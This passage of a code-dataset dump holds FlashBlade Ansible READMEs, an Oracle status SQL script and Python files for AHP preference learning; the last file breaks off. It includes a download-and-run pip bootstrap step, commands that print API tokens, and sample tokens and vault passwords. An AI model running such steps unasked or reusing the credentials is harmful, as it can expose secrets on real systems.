"text": "FlashBlade File System setup\n=========\n\nAnsible playbook and role for FlashBlade File System provisioning and configuration.\n\n\nRequirements\n------------\n**Requires: Python >=2.7, <=3.6 on Ansible control node.**\n\nAs purity-fb SDK supports Python >=2.7, <=3.6, We need to ensure that Installed Python version on Ansible control Node must be >=2.7 and <=3.6.\n\n* Install python-pip on Ansible control node.\n\n CentOS:\n ```bash\n $ sudo yum install epel-release\n $ sudo yum install python-pip\n $ sudo pip install --upgrade pip\n ```\n Ubuntu:\n ```bash\n $ sudo apt install python-pip\n $ sudo pip install --upgrade pip\n ```\n MacOS\n ```bash\n $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\n $ python get-pip.py --user\n ```\n For more details to install Ansible on MacOS, follow this [link](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html#installing-ansible-with-pip).\n\n* Install dependencies from \"requirements.txt\"\n ```bash\n $ sudo pip install -r requirements.txt \n ```\n* Install Ansible Collection for Pure Storage FlashBlade\n ```bash\n $ ansible-galaxy collection install purestorage.flashblade\n ```\n\nRole Variables\n--------------\n\nThere are two variable files \"fb_details.yml\" and \"fb_secrets.yml\" are holding the Ansible variables for the role at path `vars/<enviorement_name>`. \n\nThis role and playbook can be used to setup network on FlashBlade servers in different environments. To store role variable files user can create different directories with `vars/<environment_name>`. User must specify `<environment_name>` while running `ansible-playbook` by specifying value in extra vars command line flag `-e \"env=<environment_name>\"`.\n\nAnsible playbooks require API token to connect to FlashBlade servers. API token can be obtained by connecting FlashBlade management VIP through ssh for a specific user and running the following purity command.\n ```\n $ ssh <pureuser>@<pure_fb_mgmt_ip>\n $ pureadmin list <username> --api-token -–expose\n ```\nUpdate \"api_token\" obtained from FlashBlade in \"fb_secrets.yml\" file and \"fb_url\" value with FlashBlade Management VIP in \"fb_details.yml\".\n\nEncrypt \"fb_secrets.yml\" using Ansible-Vault and enter password when prompted. This password is required to run playbook.\n```\n$ ansible-vault encrypt fb_secrets.yml\n```\n\nUpdate variables in `fb_details.yml` and `fb_secrets.yml` files to the desired values.\n\n* fb_details.yml\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem:\n - { name: database, count: 5, size: 32G, type: nfsv4.1, nfs_rules: '*(rw,no_root_squash)' } \n - { name: tools, size: 1G, type: smb, nfs_rules: '*(rw,no_root_squash)' } \n filesystem_snapshot: \n - { filesystem_name: tools, suffix: ansible } # snap_name : tools.ansible\n filesystem_snapshot_policy:\n - { name: daily, at: 11AM, keep_for: 86400, every: 86400, timezone: Asia/Shanghai } # optional params: timezone\n \n ```\n\n* fb_secrets.yml\n ```\n array_secrets: \n FBServer1:\n api_token: T-c61e4dec-xxxx-4264-87f8-315264d9e65a\n ```\n#### Note\n * To destroy any of the filesystem use `state: disabled` in `fb_details.yml` variable file. Destroyed file systems have 24 hours to be recovered. To recover file system, run the playbook with `state: enabled` within 24 hours of deletion. Filesyetm can be eradicated by using `state: disabled` and `eradication: true` together. Eradicating a file system will also eradicate all of its related snapshots. 
\n\n ##### fb_details.yml for different scenarios \n \n **Create a File System**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem:\n - { name: database, size: 32G, type: nfsv4.1, nfs_rules: '*(rw,no_root_squash)' } \n ```\n \n **Create 5 File Systems**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem:\n - { name: database, count: 5 size: 32G, type: nfsv4.1, nfs_rules: '*(rw,no_root_squash)' } # creates 5 filesystem with name database_01....database_05. \n ``` \n **Destroy File System**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem:\n - { name: database, state: disabled } \n ``` \n **Recover File System**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem:\n - { name: database, state: enabled } \n ```\n **Eradicate File System**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem:\n - { name: database, state: disabled, eradicate: true } \n ``` \n **Create File System snapshot**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem_snapshot: \n - { filesystem_name: tools, suffix: ansible } # snap_name : tools.ansible \n ```\n **Destroy File System snapshot**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem_snapshot: \n - { filesystem_name: tools, suffix: ansible, state: disabled }\n ```\n **Recover File System snapshot**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem_snapshot: \n - { filesystem_name: tools, suffix: ansible, state: enabled }\n ```\n **Recover File System from latest snapshot**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem_snapshot: \n - { filesystem_name: tools, suffix: ansible, restore_fs_from_snap: true }\n ```\n **Eradicate File System snapshot**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem_snapshot: \n - { filesystem_name: tools, suffix: ansible, state: disabled, eradicate: true }\n ```\n **Create File System snapshot policy**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem_snapshot_policy:\n - { name: daily, at: 11AM, keep_for: 86400, every: 86400, timezone: Asia/Shanghai } # optional params: timezone\n ```\n **Delete File System snapshot policy**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem_snapshot_policy:\n - { name: daily, state: disabled } # optional params: timezone\n ```\n * To extend the File System provisioning on the fleet of FlashBlade Arrays, Add multiple \"FBServer1...N\" blocks under array_inventory in \"fb_details.yml\" file.\n Example configuration to setup DNS on two FlashBlade servers.\n \n **fb_details.yml**\n ```\n # FBServer details\n array_inventory: \n FBServer1:\n fb_url: 10.xx.126.80\n filesystem:\n - { name: database, size: 32G, type: nfsv3 } \n FBServer2:\n fb_url: 10.xx.126.110\n filesystem:\n - { name: tools, size: 32G, type: nfsv4.1 } \n ```\n **fb_secrets.yml**\n ```\n array_secrets: \n FBServer1:\n api_token: T-c61e4dec-xxxx-4264-87f8-315264d9e65a\n FBServer2:\n api_token: T-d88e4dec-xxxx-4222-87g3-315264d9e77a\n ```\nDependencies\n------------\n\nNone\n\nExample Playbook\n----------------\n\n - name: FlashBlade filesystem setup\n hosts: \"localhost\"\n gather_facts: false\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_filesystem_setup\n\nTo execute playbook, issue the following command:\n( Replace `<enviorement_name>` with the correct value 
)\n ```bash\n $ ansible-playbook filesystem_setup.yml -e \"env=<environment_name>\" --ask-vault-pass\n ```\nEnter the Ansible Vault password that was used to encrypt the \"fb_secrets.yml\" file.\n"
},
{
"alpha_fraction": 0.6337099671363831,
"alphanum_fraction": 0.6466572284698486,
"avg_line_length": 35.31196594238281,
"blob_id": "0c2638d8fbe445c648ae201e80edb1e9e3370c14",
"content_id": "b38a8f585270ba5c4759eda6cf8f1f2c11abfc34",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8496,
"license_type": "permissive",
"max_line_length": 358,
"num_lines": 234,
"path": "/flashblade/pure-fb-filesystem-replication/README.md",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "FlashBlade File System Replication, Failover and Failback/Reprotect\n=========\n\nAnsible playbooks and roles to perform FlashBlade File System Replication, Failover and Failback/Reprotect.\n\nRequirements\n------------\n\n**Requires: Python >=2.7, <=3.6 on Ansible control node.**\n\nAs purity-fb SDK supports Python >=2.7, <=3.6, We need to ensure that Installed Python version on Ansible control Node must be >=2.7 and <=3.6.\n\n* Install python-pip on Ansible control node.\n\n CentOS:\n ```bash\n $ sudo yum install epel-release\n $ sudo yum install python-pip\n $ sudo pip install --upgrade pip\n ```\n Ubuntu:\n ```bash\n $ sudo apt install python-pip\n $ sudo pip install --upgrade pip\n ```\n MacOS\n ```bash\n $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\n $ python get-pip.py --user\n ```\n For more details to install Ansible on MacOS, follow this [link](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html#installing-ansible-with-pip).\n\n* Install dependencies from \"requirements.txt\"\n ```bash\n $ sudo pip install -r requirements.txt \n ```\n* Install Ansible Collection for Pure Storage FlashBlade\n ```bash\n $ ansible-galaxy collection install purestorage.flashblade\n ```\n\nRole Variables\n--------------\n\nThere are two variable files \"fb_details.yml\" and \"fb_secrets.yml\" are holding the Ansible variables for the role at path `vars/<enviorement_name>`. \n\nThis role and playbook can be used to setup replication on FlashBlade servers in different environments. To store role variable files user can create different directories with `vars/<environment_name>`. User must specify `<environment_name>` while running `ansible-playbook` by specifying value in extra vars command line flag `-e \"env=<environment_name>\"`.\n\nAnsible playbooks require API token to connect to FlashBlade servers. API token can be obtained by connecting FlashBlade management VIP through ssh for a specific user and running the following purity command.\n ```\n $ ssh <pureuser>@<pure_fb_mgmt_ip>\n $ pureadmin list <username> --api-token --expose\n ```\nUpdate \"api_token\" obtained from FlashBlade in \"fb_secrets.yml\" file and \"fb_url\" value with FlashBlade Management VIP in \"fb_details.yml\".\n\nEncrypt \"fb_secrets.yml\" using Ansible-Vault and enter password when prompted. This password is required to run playbook.\n```\n$ ansible-vault encrypt fb_secrets.yml\n```\n\nUpdate variables in `fb_details.yml` and `fb_secrets.yml` files to the desired values.\n\n* fb_details.yml\n ```\n # FlashBlade inventory\n array_inventory: \n FBServer1:\n fb_url: 10.22.222.80\n FBServer2:\n fb_url: 10.22.222.100\n\n # Filesystem replication\n FSReplication: \n replication1:\n common_params: { repl_policy: hourly }\n client_details:\n - hosts: dc\n mount_point: /mnt/var/src-nfs\n src: { fb_name: FBServer1, data_vip: srcdatavip, fileshare: src-nfs }\n dst: { fb_name: FBServer2, data_vip: dstdatavip } \n ```\n\n* fb_secrets.yml\n ```\n array_secrets: \n FBServer1:\n api_token: T-c61e4dec-xxxx-xxxx-87f8-315264d9e65a\n FBServer2:\n api_token: T-79ced0e5-xxxx-xxxx-8741-66482f04c6d1 \n ```\n \n ##### Filesystem Replication \n In Filesystem replication local(src) and remote(dst) FlashBlades should be connected state. Replica-link will be established between local filesystem and remote filesystem with replication policy. 
\n **fb_details.yml for replication**\n ```\n # FlashBlade inventory\n array_inventory: \n FBServer1:\n fb_url: 10.22.222.80\n FBServer2:\n fb_url: 10.22.222.100\n\n # Filesystem replication\n FSReplication: \n replication1:\n common_params: { repl_policy: hourly }\n src: { fb_name: FBServer1, fileshare: src-nfs }\n dst: { fb_name: FBServer2 } \n ```\n \n ##### Filesystem failover \n In filesystem failover, the target (dst) filesystem is promoted and all clients must then be directed to the target array. The local file system is then demoted.\n \n Enter the client inventory details in `hosts.ini` and specify `mount_point` under the \"client_details\" section in the `fb_details.yml` file.\n The data VIP is required to redirect clients from the local to the remote array.\n **fb_details.yml for failover**\n ```\n # FlashBlade inventory\n array_inventory: \n FBServer1:\n fb_url: 10.22.222.80\n FBServer2:\n fb_url: 10.22.222.100\n\n # Filesystem replication\n FSReplication: \n replication1:\n common_params: { repl_policy: hourly }\n client_details:\n - hosts: dc\n mount_point: /mnt/var/src-nfs\n src: { fb_name: FBServer1, data_vip: srcdatavip, fileshare: src-nfs }\n dst: { fb_name: FBServer2, data_vip: dstdatavip } \n ``` \n ##### Filesystem failback/reprotect \n Filesystem failback requires stopping writes on the promoted remote file system, promoting the source filesystem, and redirecting all clients to the local filesystem. The remote file system is then demoted.\n \n Enter the client details in `hosts.ini` and provide the mount point and \"host/group_name\" under the \"client_details\" section in the `fb_details.yml` file.\n The data VIP is required to redirect clients from the local to the remote array.\n **fb_details.yml for failback**\n ```\n # FlashBlade inventory\n array_inventory: \n FBServer1:\n fb_url: 10.22.222.80\n FBServer2:\n fb_url: 10.22.222.100\n\n # Filesystem replication\n FSReplication: \n replication1:\n common_params: { repl_policy: hourly }\n client_details:\n - hosts: dc\n mount_point: /mnt/var/src-nfs\n src: { fb_name: FBServer1, data_vip: srcdatavip, fileshare: src-nfs }\n dst: { fb_name: FBServer2, data_vip: dstdatavip } \n ``` \n\nDependencies\n------------\n\nNone\n\nExample Playbook\n----------------\n\n* Filesystem Replication\n \n ```\n - name: FlashBlade filesystem setup\n hosts: \"localhost\"\n gather_facts: false\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_filesystem_setup\n ```\n\n* Filesystem failover\n ```\n - name: FlashBlade filesystem failover\n hosts: all\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_filesystem_failover\n ```\n* Filesystem failback\n ```\n - name: FlashBlade filesystem failback/Reprotect\n hosts: all\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_filesystem_failback\n ```\nTo execute the playbook, issue the following command:\n( Replace `<environment_name>` with the correct value )\n* Replication\n ```bash\n $ ansible-playbook filesystem_replication.yml -e \"env=<environment_name>\" --ask-vault-pass\n ```\n* Failover\n Using a remote host SSH key (replace `<ssh-key-path>` with the ssh private key path)\n ```bash\n $ ansible-playbook filesystem_failover.yml -i hosts -e \"env=<environment_name>\" --ask-vault-pass --key-file=<ssh-key-path>\n ```\n Enter the vault password when prompted.\n \n Using a remote host password (not recommended)\n ```bash\n $ ansible-playbook filesystem_failover.yml -i hosts -e 
\"env=<enviorement_name>\" --ask-vault-pass --ask-pass --ask-become-pass\n ```\n Enter vault password, hosts ssh password and root password.\n\n* Failback\n Using Remote host SSH key(Replace `<ssh-key-path>` with ssh private key path)\n ```bash\n $ ansible-playbook filesystem_failback.yml -i hosts -e \"env=<enviorement_name>\" --ask-vault-pass --key-file=<ssh-key-path>\n ```\n Enter vault password when prompted.\n\n Using Remote host password(Not Recommended)\n ```bash\n $ ansible-playbook filesystem_failback.yml -i hosts -e \"env=<enviorement_name>\" --ask-vault-pass --ask-pass --ask-become-pass\n ```\n Enter vault password, hosts ssh password and root password.\n\n**Note:** If you are using MacOS as Ansible control node and using password to connect to remote hosts, SSH connection with password not supported.\nThe workaround for this limitation is to pass `-c paramiko` flag in ansible-playbook command. Install paramiko using `pip install paramiko`."
},
{
"alpha_fraction": 0.6604413986206055,
"alphanum_fraction": 0.6994906663894653,
"avg_line_length": 27.047618865966797,
"blob_id": "382de44c052ef331c2180d2028b176d6ad910db6",
"content_id": "4aeb66cf5a20c345877211698ab904c064efe889",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1178,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 42,
"path": "/oracle-database/files/showDB.sql",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "set feed off\nset verify off\nset pagesize 0\nset linesize 132\nset echo off\nset heading off\nset termout off\n\ncol ba noprint new_value ba\ncol dc noprint new_value dc\ncol dn noprint new_value dn\ncol ds noprint new_value ds\ncol ht noprint new_value ht\ncol sa noprint new_value sa\ncol sd noprint new_value sd\ncol st noprint new_value st\ncol su noprint new_value su\n\nSELECT to_char(sysdate,'dd/mm/yy hh24:mi:ss') as sd from dual;\nSELECT banner ba from v$version;\nSELECT to_char(created,'dd/mm/yy hh24:mi:ss') as dc from v$database;\nSELECT instance_name dn, host_name ht, to_char(startup_time,'dd/mm/yy hh24:mi:ss') ds, status st FROM v$instance;\nSELECT to_char(sum(bytes)/1024/1024/1024,'9,999.99') as sa from dba_data_files;\nSELECT to_char(sum(bytes)/1024/1024/1024,'9,999.99') as su from dba_segments;\n\nset termout on\n\nprompt Current Time : &sd\nprompt\nprompt Database Details\nprompt ===============================================\nprompt Hostname : &ht\nprompt Database Name : &dn\nprompt Version : &ba\nprompt Date Created : &dc\nprompt Date Started : &ds\nprompt DB Status : &st\nprompt Allocated Space : &sa GB\nprompt Used Space : &su GB\n\nprompt\nEXIT\n"
},
{
"alpha_fraction": 0.6156749725341797,
"alphanum_fraction": 0.6347472071647644,
"avg_line_length": 36.140220642089844,
"blob_id": "33fc6d80e6673a330625ee6ac720b2ff182980ef",
"content_id": "9959ef1bacaf18d4c8351a533a46756991d0b691",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 10067,
"license_type": "permissive",
"max_line_length": 329,
"num_lines": 271,
"path": "/flashblade/pure-fb-objectstore-setup/README.md",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "FlashBlade Object Store Account, User, and Bucket Configuration\n=========\n\nAnsible playbook for FlashBlade Object Store account, user, and bucket configuration.\n\n\nRequirements\n------------\n\n**Requires: Python >=2.7, <=3.6 to be installed on the Ansible control node.**\n\nThe Python version on the Ansible control node must match the version required by the FlashBlade Python SDK (purity_fb): Python >=2.7, <=3.6\n\n* Install python-pip on Ansible control node, if it is not already installed.\n\n CentOS:\n ```bash\n $ sudo yum install epel-release\n $ sudo yum install python-pip\n $ sudo pip install --upgrade pip\n ```\n Ubuntu:\n ```bash\n $ sudo apt install python-pip\n $ sudo pip install --upgrade pip\n ```\n MacOS\n ```bash\n $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\n $ python get-pip.py --user\n ```\n For more details to install Ansible on MacOS, follow this [link](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html#installing-ansible-with-pip).\n \n* Install dependencies using the \"requirements.txt\" in the directory of this README file. (This ensures that ansible, purity-fb, netaddr, and pytz are installed):\n ```bash\n $ sudo pip install -r requirements.txt \n ```\n* Install the FlashBlade Ansible Collection: \n ```bash\n $ ansible-galaxy collection install purestorage.flashblade\n ```\n\nGenerating FlashBlade Login Credentials for Ansible Playbooks\n--------------\n\nFlashBlade Ansible playbooks require an API token to connect to FlashBlade. An API token can be obtained by using ssh to connect to the FlashBlade management IP for a user that you wish the Ansible playbook to run as, and using the ```pureadmin``` command to retrieve or create an API token.\n\nTo create or retrieve an API token, first ssh to a FlashBlade as the user you wish the Ansible playbooks to run as. 
For example, to create an API token with full admin privileges equivalent to \"pureuser\", the built-in local administrator account, ssh to FlashBlade's management IP as \"pureuser\" and specify that user's password:\n ```\n ssh [email protected]\n ```\nTo see the currently logged-in user's API token:\n ```\n pureadmin list --api-token --expose\n ```\nTo create an API token expiring in 24 hours with the same permissions as the currently logged in user:\n ```\n pureadmin create --api-token --timeout 1d\n ```\nThe above commands generate output like the following:\n ```\n Name API Token Created Expires\n pureuser T-85cc9ce8-643d-4d99-8dbc-656f38cacab0 2020-09-13 23:55:33 PDT 2020-09-14 23:55:33 PDT\n ```\nFor details, see \"Creating an API token\" in the [FlashBlade User Guide](https://support.purestorage.com/FlashBlade/Purity_FB/FlashBlade_User_Guides).\n\nUpdate \"api_token\" in the \"fb_secrets.yml\" file with the value obtained from FlashBlade, and set the \"fb_url\" value in \"fb_details.yml\" to the FlashBlade Management VIP. \n\n\nSpecifying FlashBlade API credentials for this playbook\n--------------\n\nThis playbook supports organizing your FlashBlade credentials and configuration details into groups of FlashBlade arrays referred to here as \"environments\".\n\nTo specify credentials for this playbook to log into FlashBlade, create a file (relative to this playbook's location) at\n ```\n var/<your_env_name>/fb_secrets.yml\n ```\nwhere <your_env_name> is a name you assign to a group of one or more FlashBlade arrays.\n\nThe fb_secrets.yml file should look like this:\n ```\n ---\n array_secrets:\n FlashBlade1: # this must match the identifier used for this FlashBlade in fb_details.yml\n api_token: T-0b8ad89c-xxxx-yyyy-85ed-28660EXAMPLE # API token obtained from FlashBlade\n\n s3_ansible_vault_pass: somepassword # Required in order to encrypt s3 secret files \n ```\n\nFor an example of an fb_secrets.yml file, see:\n ```\n var/region/fb_secrets.yml\n ```\n\nSpecifying FlashBlade connection details and Object Store configuration\n--------------\n\nTo configure your FlashBlade connection details and the Object Store account, user, and bucket names you would like to provision, create a file at:\n ```\n var/<your_env_name>/fb_details.yml\n ```\n\nThe fb_details.yml file should look similar to this:\n ```\n array_inventory: \n FlashBlade1: # this must match the identifier used for this FlashBlade in fb_secrets.yml\n fb_url: 10.20.30.40\n object_store:\n - account: your-account\n state: enabled\n users: \n - {name: your-object-store-user, create_new_access_key: true, state: enabled}\n buckets: \n - {name: your-bucket-name, state: enabled, eradicate: false, versioning: enabled} \n ```\n\nAs an example of an fb_details.yml file, see:\n ```\n /var/region/fb_details.yml\n ```\n\n\nRunning this playbook\n--------------\n\nTo run this playbook, specify the playbook name and your environment name at the command line:\n ```bash\n ansible-playbook object_store_setup.yml -e \"env=<your_env_name>\"\n ```\n\nUsing Ansible Vault to Encrypt FlashBlade Credentials\n--------------\n\nIt is strongly recommended that you avoid storing FlashBlade API credentials in a plain text file.\n\nYou can use Ansible Vault to encrypt your FlashBlade API credentials using a password that can be specified later at the command line when running your playbook.\n\nTo encrypt the fb_secrets.yml file, first specify a password in the `s3_ansible_vault_pass` variable in the \"fb_secrets.yml\" file (for use by the playbook itself during execution) and then run\n ```\n 
ansible-vault encrypt fb_secrets.yml\n ```\nEnter the same password when prompted to encrypt the file.\n\nTo execute a playbook using an encrypted fb_secrets.yml file:\n ```bash\n ansible-playbook object_store_setup.yml -e \"env=<your_env_name>\" --ask-vault-pass\n ```\nEnter the Ansible Vault password that was used to encrypt the \"fb_secrets.yml\" file.\n\n\nNotes on using this playbook\n--------------\n\n#### Note\n * To destroy a bucket, use `state: disabled` in the \"buckets\" section of the `fb_details.yml` variable file. A destroyed bucket can be recovered within 24 hours. To recover a bucket, run the playbook with `state: enabled` within 24 hours of deletion. Buckets can be eradicated by using `state: disabled` and `eradicate: true` together.\n\n\nExamples\n--------------\n ##### fb_details.yml for different scenarios \n \n **Create Object-store Account, user and bucket**\n ```\n array_inventory: \n FlashBlade1:\n fb_url: 10.22.222.151 \n object_store:\n - account: account1\n state: enabled\n users: \n - { name: user1, create_new_access_key: true, state: enabled }\n buckets: \n - { name: bucket1, state: enabled, eradicate: false, versioning: enabled } \n ```\n \n **Destroy Bucket**\n ```\n array_inventory: \n FlashBlade1:\n fb_url: 10.22.222.151 \n object_store:\n - account: account1\n buckets: \n - { name: bucket1, state: disabled } \n ```\n **Recover Bucket**\n ```\n array_inventory: \n FlashBlade1:\n fb_url: 10.22.222.151 \n object_store:\n - account: account1\n buckets: \n - { name: bucket1, state: enabled } \n ```\n **Eradicate Bucket**\n ```\n array_inventory: \n FlashBlade1:\n fb_url: 10.22.222.151 \n object_store:\n - account: account1\n buckets: \n - { name: bucket1, state: disabled, eradicate: true } \n ``` \n **Create User with key**\n ```\n array_inventory: \n FlashBlade1:\n fb_url: 10.22.222.151 \n object_store:\n - account: account1\n users: \n - { name: user1, create_new_access_key: true } \n ```\n **Create User without key**\n ```\n array_inventory: \n FlashBlade1:\n fb_url: 10.22.222.151 \n object_store:\n - account: account1\n users: \n - { name: user1, create_new_access_key: false } \n ```\n * To extend the Object-store provisioning to a fleet of FlashBlade arrays, add multiple \"FlashBlade1...N\" blocks under array_inventory in the \"fb_details.yml\" file.\n Example configuration to set up Object-Store on two FlashBlade servers.\n \n **fb_details.yml**\n ```\n array_inventory: \n FlashBlade1:\n fb_url: 10.22.222.151 \n object_store:\n - account: account1\n state: enabled\n users: \n - { name: user1, create_new_access_key: true, state: enabled }\n buckets: \n - { name: bucket1, state: enabled, eradicate: false, versioning: enabled }\n FlashBlade2:\n fb_url: 10.22.222.152 \n object_store:\n - account: account2\n state: enabled\n users: \n - { name: user2, create_new_access_key: true, state: enabled }\n buckets: \n - { name: bucket2, state: enabled, eradicate: false, versioning: enabled } \n ```\n **fb_secrets.yml**\n ```\n array_secrets: \n FlashBlade1:\n api_token: T-0b8ad89c-xxxx-yyyy-85ed-286607dc2cd2\n FlashBlade2:\n api_token: T-0b8ad822-xxxx-yyyy-85ed-286607dc2cd2\n \n s3_ansible_vault_pass: pureansible # Required to encrypt s3 secret files \n ```\n\nOther notes\n--------------\n\n* If creating S3 credentials for a user (`create_new_access_key: true`), s3_secrets will be stored in an encrypted file with name `<account_name>_<user_name>.yml` at path `vars/<environment_name>/s3_secrets/`. 
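\n As a minimal sketch, a decrypted s3 secrets file could contain the user's generated access key pair; the field names and values below are purely illustrative assumptions, not taken from the playbook's documentation:\n ```\n # vars/<environment_name>/s3_secrets/account1_user1.yml (illustrative)\n access_key_id: PSFBSAZREXAMPLEKEY # hypothetical field name and value\n secret_access_key: B43B4448D9ADEXAMPLESECRET # hypothetical field name and value\n ```\n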
Use Ansible Vault to decrypt the s3_secrets file(s).\n ```\n ansible-vault decrypt <s3_secrets_filename> --ask-vault-pass\n ```\n Enter the vault password (`s3_ansible_vault_pass`) when prompted.\n* A maximum of 2 access keys are allowed per user, so after running this playbook twice with the `create_new_access_key: true` parameter, no further attempt will be made to create a new access key.\n\n\n"
}
] | 15 |
mvoicer/cbic-2021-learning-preferences | https://github.com/mvoicer/cbic-2021-learning-preferences | 69eac1ec28a83f654eb4690ff9cdd092ae756ba8 | 9ddd5449d5cae5a8f1cdafc6fa34b13ee83076b2 | 23282a99796fdc8890220f757692b23040db2808 | refs/heads/main | 2023-08-23T14:35:47.511509 | 2021-10-05T03:30:56 | 2021-10-05T03:30:56 | 400,648,625 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5224466919898987,
"alphanum_fraction": 0.5448933839797974,
"avg_line_length": 28.724138259887695,
"blob_id": "96b1f509c37ed40ea328cb0f3815cccead99b30d",
"content_id": "7f7262377b4d75ac9411ebec862908e7bf0da56b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1782,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 58,
"path": "/preferences.py",
"repo_name": "mvoicer/cbic-2021-learning-preferences",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport pandas as pd\r\n\r\n\r\n# Define Saaty's 1-9 Scale for AHP Preference\r\ndef matrix_intervalos(A):\r\n max_A = np.max(A, axis=0)\r\n min_A = np.min(A, axis=0)\r\n I = np.zeros(shape=(9, len(max_A)))\r\n for i, (menor, maior) in enumerate(zip(min_A, max_A)):\r\n intervalos = np.linspace(menor, maior, 9)\r\n I[:, i] = intervalos.ravel()\r\n return I\r\n\r\n# Calculate the differences among the nominal values of the objectives\r\ndef my_cdist(df_obj):\r\n n_row = df_obj.shape[0]\r\n m1 = np.tile(df_obj, (n_row, 1))\r\n m2 = np.tile(df_obj.reshape(-1, 1), (1, n_row))\r\n return m2 - m1\r\n\r\n# Calculate the preferences\r\ndef preferencia(df_dif, interval):\r\n\r\n df_pref = np.ones(shape = df_dif.shape)\r\n\r\n it = np.nditer(df_dif, flags=['multi_index'])\r\n\r\n for x in it:\r\n for j, _ in enumerate(interval):\r\n if j == len(interval):\r\n df_pref[it.multi_index] = 9 if x < 0 else 1.0 / 9.0\r\n # df_pref[it.multi_index] = 1.0 / 9.0 if x > 0 else 9\r\n break\r\n\r\n if interval[j] <= np.abs(x) <= interval[j + 1]:\r\n df_pref[it.multi_index] = 1.0 / (j + 1) if x < 0 else j + 1\r\n # df_pref[it.multi_index] = j+1 if x > 0 else 1.0 / (j + 1)\r\n break\r\n return df_pref.round(3)\r\n\r\n\r\ndef notas_pref(A):\r\n df_pref = pd.DataFrame()\r\n I = matrix_intervalos(A)\r\n\r\n # For each objective\r\n for i, sol in enumerate(A.T):\r\n # Calculate the difference among the values\r\n df_dif = my_cdist(sol)\r\n # Get the intervals\r\n interval = I[:, i]\r\n # Generate the PC matrices\r\n pp = pd.DataFrame(preferencia(df_dif, interval), index=None)\r\n\r\n df_pref = pd.concat([df_pref, pp], axis=1)\r\n\r\n return df_pref\r\n"
},
{
"alpha_fraction": 0.6106911301612854,
"alphanum_fraction": 0.6252699494361877,
"avg_line_length": 31.469879150390625,
"blob_id": "b97f75addeb7e051fad165dd1eb902b28b306544",
"content_id": "b63c5e4da0bf546ccf53425d136cecb05f642f45",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5556,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 166,
"path": "/main.py",
"repo_name": "mvoicer/cbic-2021-learning-preferences",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nimport random\r\nimport pickle\r\nfrom tqdm import tqdm\r\nimport seaborn as sns\r\nfrom sklearn.metrics import *\r\nfrom matplotlib import pyplot as plt\r\n\r\nfrom preferences import notas_pref\r\nfrom ahp import ahp\r\nfrom data_preparation import create_subsample\r\nfrom fine_tunning import fine_tunning\r\nfrom data_preparation import merge_matrices\r\nfrom tau_distance import normalised_kendall_tau_distance\r\n\r\nlen_Q = 5 # n_samples to be evaluated\r\nCV = 5 # number of cross-validation\r\ntest_size = 0.2 # 80% train and 20% test\r\naccepted_error = .05 # max tau distance accepted between current ranking and the predicted one\r\n\r\ndf_var = pd.read_csv(\"dec_5obj_p2.csv\", header=None) # decision variables\r\n# df_var = df_var.iloc[0:55, :].round(5)\r\ndf_obj = pd.read_csv('obj_5obj_p2.csv', header=None) # values in Pareto front\r\n# df_obj = df_obj.iloc[0:55, :].round(5)\r\n\r\nnpop, nvar = df_var.shape\r\nnobj = df_obj.shape[1]\r\n\r\n# Generate the preferences\r\ndf_obj = df_obj.to_numpy()\r\ndf_pref = notas_pref(df_obj)\r\n\r\n# AHP from the original alternatives\r\nrank_ahp = ahp(df_pref).index\r\n\r\n# Generate the index to be evaluated\r\nindex = list(df_var.index)\r\n\r\n# Aleatory ranking\r\naleatory = index.copy()\r\nrandom.shuffle(aleatory)\r\n\r\n# Start an aleatory ranking\r\nrank_aleatory = aleatory.copy()\r\n\r\n# Distances\r\ncurrent_previous = []\r\ncurrent_ahp = 